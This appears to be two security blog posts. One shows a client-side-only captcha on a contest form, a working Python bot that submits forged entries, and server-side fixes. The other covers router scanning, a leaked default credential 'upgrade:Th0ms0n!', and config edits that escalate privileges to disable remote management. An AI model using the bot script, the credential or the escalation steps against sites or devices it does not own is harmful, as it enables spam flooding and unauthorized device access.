Client-side anti-bot mechanism #exerciseinfutility

Hello paranoids

Today, I bring a laughable case of input verification and anti-bot measures. Let us get straight to the point, shall we?

While checking an online contest, I stumbled across this (the form is from a Portuguese website and was in Portuguese as well):

Contest form

BI is an 8-digit string that unequivocally identifies a citizen (a citizen ID of sorts). I highlighted the “8+9” operation with the mouse. I am pretty sure you can tell what is coming next:

80’s captcha

At first, this seemed like a pretty old-school captcha. This raises two questions:

  1. Is the validation client-side?
  2. Is the value hardcoded on the served page?

Well, a hardcoded value should mean server-side verification, but you never know. Once I dug into the source scripts, I found this:

Client-side verification scripts.

For those wondering which fields are required, they are: name, email, BI, phone and place. As you can see, only the email and the “hipster captcha” are actually validated; the others are checked for emptiness at most. The other fields sent are hidden and easily retrievable with a basic script. As for cookies, you get an ASP.NET_SessionId through the Set-Cookie header, plus other cookies which I assume are related to statistics (e.g. __gads).

Now, the saddest part here, for both attackers and application owners, is that the form seems to always succeed: with or without cookies, with or without an email. To make things worse, the end user gets no confirmation email, which means I cannot tell whether my participation was accepted or not (i.e. whether my attack succeeded or not). I may be wrong, but I assume that once the form is submitted any errors from the database are ignored and the end user receives an accepted response. The other explanation is that the database fields are all strings and thus there is no type checking (AHH HELL NA!). Still, all this data suffices to create an automated script. In order to make the automated tool more user-like, I will retrieve the session cookie.

This Python script should do the trick:

import http.client as httpc
import urllib.parse as urlparse

host = 'cannot_tell_you_the_host'
form_path = '/path/to/the/contest/form'  # placeholder: the real path is not given here
headers = {'Host': host,
           'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'Accept-Encoding': 'gzip, deflate',
           'Connection': 'keep-alive'}

# Form fields - should use DOM but I am lazy (the field names used below are placeholders)
subject = urlparse.quote_plus('Bilhetes O último caçador de bruxas')
name = urlparse.quote_plus('John doe')
place = urlparse.quote_plus('Cinemas NOS COLOMBO (Lisboa)')
place_question = urlparse.quote_plus('Onde queres ver o filme?')

# Warm-up GET: load the form like a browser would and grab the session cookie
bot_warmup_connection = httpc.HTTPConnection(host, 80)
bot_warmup_connection.request('GET', form_path, headers=headers)
first_get_response = bot_warmup_connection.getresponse()
first_get_response.read()  # drain the body so the connection can be closed cleanly
bot_warmup_connection.close()

# Keep only "ASP.NET_SessionId=..." and drop the cookie attributes (path, HttpOnly, ...)
headers['Cookie'] = first_get_response.getheader('Set-Cookie').split(';')[0]
headers['Content-Type'] = 'application/x-www-form-urlencoded'

# Submit the form directly; the browser-side checks never run for this request.
# email, BI and phone would be added here too, using the names from the form's HTML.
body = '&'.join(['subject=' + subject, 'name=' + name, 'place=' + place,
                 'place_question=' + place_question])
bot_submit_connection = httpc.HTTPConnection(host, 80)
bot_submit_connection.request('POST', form_path, body=body, headers=headers)
submit_response = bot_submit_connection.getresponse()
response_body = submit_response.read()
bot_submit_connection.close()

if submit_response.status == 200:
    # The site answers 200 regardless, so this only tells us the request went through
    print('Submitted, status 200 (%d bytes of response body)' % len(response_body))
else:
    print('Unexpected status', submit_response.status)

This script suffers from some issues and limitations since the website does not give appropriate feedback on the success of the submission (e.g. an email, an HTTP error code or a server-side response), leaving the bot, and even a non-malicious user, clueless (it is an example of bad security and programming…oh well..). Add automated generation of BIs and emails and you have enough juice to fill their entire database (or their .txt file, I can’t even tell anymore).

The saddest part here is that I have previously notified the website owners (this is not the first time they use such poor security mechanisms) about this page and got no response and no changes. People tend to program according to the “just works!/simplicity over security” paradigm, leaving security aside until they suffer the consequences of their poor decisions. What I have just presented here is not alarming (it is not a data breach of some sort). Yet, it is enough to fill their database with garbage, leaving other legitimate contest participants out.

You think you’re so smart. What would you do?

Well, I am glad you asked. First, the captcha should be an image (it is tough or close to impossible to extract the characters from a properly made captcha) and second, it should be generated and verified by the server. What is the point in having the client generate and verify something meant to protect the application from malicious clients? There are plenty of libraries to create captchas for PHP, ASP, etc. Since I do not know which ones are safer, I will not name any (hacked readers are unsatisfied readers :P).
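As an added example (not code from the original post or from the website in question), here is how the server side of that contest form could generate and verify the arithmetic challenge itself, together with the field checks the page left to the browser. The challenge is single-use and expires; the field names, the phone format and the in-memory dictionary standing in for a session store are my assumptions.

```python
import hmac
import re
import secrets
import time

CHALLENGE_TTL = 300        # seconds a challenge stays valid
_pending = {}              # token -> (answer, expiry); assumption: stands in for a session store
BI_RE = re.compile(r'^\d{8}$')              # BI: exactly 8 digits, as the post describes
EMAIL_RE = re.compile(r'^[^@\s]+@[^@\s]+\.[^@\s]+$')
PHONE_RE = re.compile(r'^\+?\d{9,15}$')     # assumption: the post gives no phone format


def issue_challenge():
    """Server picks the operands; the client only ever sees the question and an opaque token."""
    a = secrets.randbelow(90) + 10
    b = secrets.randbelow(90) + 10
    token = secrets.token_urlsafe(16)
    _pending[token] = (str(a + b), time.time() + CHALLENGE_TTL)
    return token, '%d+%d' % (a, b)


def verify_submission(form):
    """Return the list of rejection reasons; an empty list means the submission is accepted."""
    errors = []
    # The token is consumed on first use, so a correct answer cannot be replayed
    answer, expiry = _pending.pop(form.get('captcha_token', ''), (None, 0.0))
    if answer is None or time.time() > expiry:
        errors.append('captcha missing or expired')
    elif not hmac.compare_digest(answer.encode(), form.get('captcha', '').strip().encode()):
        errors.append('captcha wrong')
    if not form.get('name', '').strip():
        errors.append('name required')
    if not EMAIL_RE.match(form.get('email', '')):
        errors.append('email invalid')
    if not BI_RE.match(form.get('bi', '')):
        errors.append('bi must be 8 digits')
    if not PHONE_RE.match(form.get('phone', '')):
        errors.append('phone invalid')
    if not form.get('place', '').strip():
        errors.append('place required')
    return errors
```

Nothing here depends on the browser's cooperation: a request that skips the page's JavaScript entirely still has to present a valid, unused token and the right answer.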

Stay safe 😉

Technicolor TG784n v3 hidden dangers and privilege escalation (made simple)

If you are reading this post: congratulations! You are reading my first post ever on a blog.

I am pretty sure we share (if you like security) some concerns regarding the internet-connected devices in your house, especially those you can’t fully understand (in my case smartphones and ISP devices). This post concerns the latter since, even though I am not familiar with Technicolor routers, I am still familiar with routers. I wanted to answer the question:

What services does my router offer, especially to the outside world?

First, a little Network 101:

Some of the things I will say here are not rocket science and you most likely know them, but I think it is still important to reiterate them because this blog intends to bring security solutions and concerns to everyone. The internet device you see in your house, which was put there by your Internet Service Provider (ISP), routes your traffic between your internal devices, and between them and the internet. You may have dozens of internet-connected devices in your house, with different (private) IP addresses, but they are all mapped to a single public IP address given by your ISP to identify your network to the world. Such mapping is made using NAT+PAT (Network Address Translation + Port Address Translation). Since you are mapping multiple private addresses to a single public one, you must distinguish packets from different internal devices based on ports. Network 101 is over! Time to get to the interesting parts.

ISP routers offer multiple services to network users (e.g. DNS, FTP, an HTTP management page, Telnet for router management). While I knew this already, I was curious to find out which other services were there. These services are typically protected from outside access, i.e., only users with private addresses may reach them, which makes sense. Yet, the services I wanted to find out more about were the external ones, available on the public address of the router (you can have different services on different router addresses by playing with the firewall).

I started with the internal network. Nmap to the rescue:

nmap -p0- -A -T5 -v default_gateway

-p0-: all ports from 0 to 65535
-A: aggressive/advanced mode, which performs OS/service fingerprinting and traceroute
-T5: maximum speed (I am scanning the router in my own house)
-v: show verbose output
default_gateway: the router address your devices use to send traffic to networks other than your current one (e.g. the internet).

Nmap reported six open ports (services):

    • 21 (FTP): to store files. Typically used by the media center capabilities of the router.
    • 23 (Telnet): to allow router management. If you trust your family you may keep Telnet.
    • 53 (DNS): used by your network devices for name resolution.
    • 80 (HTTP): user-friendly/limited/buggy administration alternative.
    • 443 (SSL): reported as remote management.
    • 1723 (PPTP): VPN server, I suppose.

The only service ringing my paranoid bells is 443 (SSL). Yet, it is only seen internally, so I ignored it for the time being. I skipped to the true troublemaker: the external IP. I performed the same Nmap command, but this time against my public address (check yours in I also ran Nmap from a public server to rule out firewall restrictions and make the scan more realistic. Nmap reported one open port, 51005, but could not clearly identify what service was there:

CWMP server port open

So I tried to connect to that port using the browser and received this:

HTTP response from 51005

I don’t know about you, but I had to change my pants because this intel made me dirty them. So I searched for the port and the router and found out that this service was a server for CWMP, the CPE (Customer-Premises Equipment) WAN Management Protocol. An acronym inside an acronym made me fetch another fresh pair. I am far from being an expert on this remote management protocol, but both words sound suspicious, so I needed to stop that service. However, I could not find the option on the web interface (work smart, not hard). Just out of curiosity I checked other addresses in the range of my operator and noticed that they were running the same service. The passwords are most likely the same for every router and I will dig deeper into that later.

So, I tried to telnet into my router with the same user/password as the one used on the web interface: Administrator with an empty password. Yes, the password is blank. Routers’ default administrator accounts are widely known to be limited (cough…useless…cough cough). The services running on this router can be listed with: service system list (either directly or by going through each menu: service => system => list). As I expected, the service was not shown to me using the Administrator account (I couldn’t access the system menu), which led me to search for the root password, the debug password and privilege escalation, but Google didn’t have the solution. Some people suggested going to the FTP server to get the user.ini config, modify it and replace it, but the Administrator user couldn’t even ls the current directory (WTF?). So, I found out about another user:password, upgrade:Th0ms0n!, which apparently had more privileges. I tried it on the Telnet server, but that user wasn’t enabled there, so I tried it on the FTP server and managed to get the user.ini:

I searched the user.ini for Administrator and found this:

Users and roles relations

Sorry for blurring the hashes. It is not that I don’t trust you but..I don’t. Through the web administration page source, I managed to find out what hash2 was (MD5, really? says my mom). I could not find the meaning of the other fields, but the role key is interesting. So I changed the Administrator role to root, uploaded the new file and restarted the router. Once more, I FTPed to the router as Administrator but still couldn’t even ls, bro! I checked the Administrator entry in user.ini and noticed that the role was Administrator once more…weird… I checked the files on the main FTP directory again and found another interesting file: security.cfg, with the following interesting entries prefixed with r (there were more):

Roles definition

Well, I guess I hit the culprit. I assumed the r’s meant roles, which makes this some sort of hierarchy (genius!) where Administrator is a weak/limited role. I also assumed that after the second “;” came the capabilities of the role. SuperUser seems all juiced up since it inherits from root and has lots of any’s, so:

Setting Administrator with the same privileges as SuperUser

I tried:

in the hope of getting all the privileges from root (no specification == default == full power), but I assume I must specify them. After this I could finally access the router services menu and turn off the CWMP service:

Enabled 51005 service

As you can see, there are two CWMPs (-C and -S, Client and Server respectively). This is because the operator may connect to the router’s CWMP-S, and the router may contact an operator CWMP server to retrieve configurations. The CWMP client concerns me too, since I am not sure whether the operator may push a different configuration, leaving me once more out of the cool root group, but I will worry about that later.

How do I turn off this service, then?

The Technicolor router has (as expected) an interface similar to other, more widely used routers (the notion of menus and submenus). “?” lists the available commands; when you type a command and press enter you go to that command’s menu, and if you want to go back just type “..” (shell users will find this familiar). To disable the service type: service, then system and then modify. You will be asked for name, state, port, qoslabel, etc. Just put the name “CWMP-S” and the state “disabled”. Leave the others empty (just press enter until you see a message):

:service system modify name=CWMP-S state=disabled

To finish, just type “saveall”, press enter, wait to see the prompt again and you are ready to go! I re-scanned my public IP and the service was no longer available (one less thing to worry about).

Final considerations

This post was meant for the more paranoid people. To be honest, I had never messed with this router before, but after escalating privileges I will now customize it to my needs (i.e. mess with the firewall and IDS). I am not implying with this post that you should disable the remote management service out of fear that your ISP may connect to it. I am not even sure of the management capabilities of this service. I am more concerned with the possibility of a malicious hacker bruteforcing my router or using a leaked password, which I am pretty sure is the same as on any other router from the same ISP. I did not mention it, but you should always keep a backup of the modified files (I keep .save files on the FTP server). In upcoming posts I may analyze the stored passwords to check if I can find the default service password. This post is huge, as you may notice, but it is my first and I wanted you to get to know my writing style and myself a little better.

Stay safe 😉